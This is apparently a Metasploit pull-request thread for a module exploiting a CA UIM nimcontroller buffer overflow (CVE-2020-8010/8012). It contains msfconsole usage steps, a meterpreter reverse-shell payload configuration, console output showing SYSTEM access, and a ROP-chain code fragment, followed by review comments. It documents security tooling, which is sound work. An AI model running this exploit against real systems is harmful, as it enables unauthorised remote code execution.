CVE-2020-8010 & CVE-2020-8012

[wetw0rk]

CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow

This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller. The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list probe. Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the directory_list probe.

Verification Steps

1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
2. Start msfconsole
3. Do use exploit/windows/nimsoft/nimcontroller_bof
4. Do set RHOSTS <ip>
5. Do exploit
6. Verify shell is opened and service is still accessible

msf5 exploit(windows/nimsoft/nimcontroller_bof) > options 

Module options (exploit/windows/nimsoft/nimcontroller_bof):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DIRECTORY  C:\              no        Directory path to obtain a listing
   RHOSTS     W.X.Y.Z          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      48000            yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     A.B.C.D          yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal (x64) - v7.80.3132


msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit 

[*] Started HTTPS reverse handler on https://A.B.C.D:8443
[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\

 12/15/2019 06:24 PM  <DIR> $GetCurrent
 12/14/2019 01:41 AM  <DIR> $Recycle.Bin
 10/18/2019 05:55 PM  <DIR> Documents and Settings
 07/21/2020 10:15 AM  <DIR> pagefile.sys
 07/14/2020 03:41 PM  <DIR> PerfLogs
 06/10/2020 09:18 AM  <DIR> Program Files
 07/19/2020 01:37 PM  <DIR> Program Files (x86)
 07/14/2020 03:41 PM  <DIR> ProgramData
 12/15/2019 07:08 PM  <DIR> Recovery
 07/21/2020 10:15 AM  <DIR> swapfile.sys
 10/18/2019 04:04 PM  <DIR> System Volume Information
 12/15/2019 07:09 PM  <DIR> Users
 07/18/2020 02:20 PM  <DIR> Windows

[+] W.X.Y.Z:48000 - The target is vulnerable.

meterpreter > 
[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DESKTOP-JICNNRT
[*] Current server process: notepad.exe (1860)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 7472
[+] Successfully migrated into process 7472

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
DIRECTORY => C:\Users\
msf5 exploit(windows/nimsoft/nimcontroller_bof) > check

[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\Users\

 03/19/2019 12:02 AM  <DIR> All Users
 12/15/2019 07:14 PM  <DIR> Default
 03/19/2019 12:02 AM  <DIR> Default User
 03/18/2019 11:49 PM  <DIR> desktop.ini
 07/19/2020 01:37 PM  <DIR> REDACTED
 12/15/2019 09:07 PM  <DIR> Public

[+] W.X.Y.Z:48000 - The target is vulnerable.

From #13866.

[acammack-r7]

This looks neat, thanks! As much as I enjoy the endless range syntax from Ruby 2.6, we still have to support Ruby 2.5 for now, so these have to be converted to the more tradtional [i..-1] syntax.

[label-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[wetw0rk]

not a fan of how rubocopy spaces it 🤮, but it is what it is 😂

120     alignment = rand_text_alphanumeric(7) # Adjustment for the initial chain
121     rop_chain = generate_rsp_chain # Stage1: Stack alignment
122     rop_chain += rand_text_alphanumeric(631) # Adjust for second stage
123     rop_chain += generate_rop_chain # Stage2: GetModuleHandleA, GetProcAddressStub, VirtualProtectStub
124     rop_chain += rand_text_alphanumeric((3500 - # ROP chain MUST be 3500 bytes, or exploitation WILL fail

[smcintyre-r7]

Comments regarding Ruby 2.5 support have been addressed

[smcintyre-r7]

So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to CA UIM in your docs but: 1) it doesn't look like there's any reference to a nimsoftrobotXXX.exe and 2) it looks like you have to have a support contract to login and access the installers.

Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

[bcoles]

So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to CA UIM in your docs but: 1) it doesn't look like there's any reference to a nimsoftrobotXXX.exe and 2) it looks like you have to have a support contract to login and access the installers.

Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

Software is not available as per #13866 (comment)

[smcintyre-r7]

Thanks! I missed that PR for context. In that case, as was stated, we'll definitely need a PCap for demo purposes sent over to msfdev@metasploit.com (feel free to CC me directly at smcintyre@metasploit.com). I'll keep my eye out for it and once I've had a chance to review it, I can see about landing this PR.

[wetw0rk]

@bcoles unfortunately you are correct you cannot get this software without contacting CA or Broadcom. I'm actually unaware of the exact download link as this software was just handed to me to begin research on. You can find more research on this protocol here:

https://github.com/wetw0rk/CA-UIM-Nimbus-Research

Went ahead and shot you an email @smcintyre-r7 lemme know if you guys need anything else. Wish I could get you a copy but unfortunately cannot.

[smcintyre-r7]

After reviewing the PCap that was sent to the Metasploit developers mailing list, everything appears to be in order. I made a few minor changes to the docs per suggestions from msftidy_docs in commit 2fb89f4 and have landed this module.

Thank you for this contribution @wetw0rk ! 🎉

It's not every day I see a ROP chain for 64-bit Windows, so that's pretty cool.

[smcintyre-r7]

Release Notes

New module exploits/windows/nimsoft/nimcontroller_bof achieves remote code execution by exploiting an unauthenticated, remotely-exploitable stack buffer overflow in CA Infrastructure Management monitoring agents prior to 9.20. The relevant vulnerabilities are CVE-2020-8010 and CVE-2020-8012.

[wetw0rk]

w00tw00t thanks man 🔥 🎊